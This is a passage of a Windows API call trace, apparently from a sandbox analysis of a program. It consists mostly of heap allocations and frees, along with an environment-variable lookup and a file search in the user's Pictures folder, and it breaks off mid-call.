(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.244] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.244] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.247] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0210.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0210.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/H4_H0S0fmbzOF.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31506860, 